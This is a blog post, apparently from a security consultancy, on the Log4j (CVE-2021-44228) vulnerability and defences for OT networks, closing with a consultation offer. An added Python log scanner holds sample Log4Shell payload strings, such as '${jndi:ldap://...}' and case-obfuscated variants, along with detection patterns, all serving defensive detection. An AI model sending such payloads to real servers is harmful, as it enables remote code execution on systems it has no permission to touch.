It seems that 2021 has been full of Cyber Security events and challenges. Well, don’t worry: 2021 is looking to go out with a Cyber Security finale, the “log4j” vulnerability, which affects just about anything on the internet.
“log4j” is a free and open-source logging library from Apache that most companies use. It records how programs run; these logs allow for code auditing and are a routine mechanism for investigating bugs and other functionality issues. Since “log4j” is free and widely trusted, companies have been using it in all kinds of systems. What’s ironic is that the bug-checking tool is now a bug itself, one that is actively being exploited for malicious activities.
The “log4j” vulnerability’s official name is CVE-2021-44228, and it carries a severity rating of 10 on the Common Vulnerability Scoring System scale, the worst score possible. The “log4j” bug is a zero-day remote code execution flaw that attackers can exploit to download and run scripts on targeted servers without any action by the victims.
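Because the exploit arrives inside text that the server logs, one practical defensive check is to scan existing web-server logs for the lookup string that triggers this bug. The scanner below is an added example, not code from the original post; the log lines are constructed, the hostnames use the reserved .invalid domain, and the normalization handles only the common case-change, default-value and URL-encoding disguises, so it is a heuristic rather than proof of compromise.

```python
import re
import urllib.parse

# Constructed sample web-server log lines for this example (not real traffic).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:20:01:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:20:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:20:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:20:01:14 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.2 - - [10/Dec/2021:20:01:15 +0000] "GET /help?topic=jndi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Innermost Log4j lookups that are nested to disguise the keyword:
#   ${lower:J} / ${upper:j} change case; ${::-j} or ${env:NOPE:-j} fall back to the text after ":-".
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _apply_case(match: re.Match) -> str:
    value = match.group(2)
    return value.lower() if match.group(1).lower() == "lower" else value.upper()

def normalize(text: str) -> str:
    """Peel off URL encoding and nested lookups so the plain ${jndi: form becomes visible."""
    for _ in range(3):  # payloads are sometimes double-encoded in query strings
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:  # resolve lookups inside-out until nothing changes
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), _CASE_LOOKUP.sub(_apply_case, text))
        if resolved == text:
            return text
        text = resolved

def is_log4shell_indicator(line: str) -> bool:
    """True if the line contains a JNDI lookup string after normalization (a heuristic, not proof)."""
    return _JNDI.search(normalize(line)) is not None

def scan(lines):
    """Return the log lines that carry a JNDI lookup indicator."""
    return [line for line in lines if is_log4shell_indicator(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print("SUSPECT:", hit)
```

A hit means an attempt was logged, not that the lookup succeeded; correlate with outbound LDAP/RMI/DNS connections from the host and with the patch level of the application.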
“log4j” first made national headlines when its vulnerability took down Kronos payroll and HR services. Soon after, it was discovered that “log4j” affected other vendors like VMware, Schneider Electric, Siemens, and many more.
One area that appears to be the most vulnerable is OT (operational technology) environments, or critical infrastructure like power distribution and water facilities. Manufacturing environments are typically defenseless and are often hard or impossible to patch. However, there are some basic things you can do to protect your environment and defend against Cyber Attackers.
First, patch any edge devices such as Next Generation Firewalls and public-facing servers. Your firewalls are your first line of defense in protecting your environment from being exploited.
Second, install physical controls, or isolate all industrial control and safety systems, components, peripheral equipment, and networks behind Next Generation Firewalls. Again, many industrial devices do not have Cyber Security controls built in or cannot be patched. The best way to defend industrial control devices is to physically segment them from the business environment and force any communications between the zones to flow through a firewall.
Third, minimize network exposure for all control system devices and ensure that they are not accessible from the Internet. When remote access is required, use secure methods such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities of their own and should be updated to the most current version available. Also, understand that VPNs are only as secure as the devices connected to them.
Most of all, if you don’t have an inventory system in place today, now would be a great time to evaluate your inventory and cyber security posture, develop a path forward to identify Cyber Security risks, and ultimately develop a strategy to mitigate the risks that could affect your environment.
If you or your organization needs assistance with your Cyber Security strategy, please feel free to reach out for a free consultation. You can reach us at [email protected] or call 727.220.2216 to set up an appointment to talk to a Cyber Security Specialist.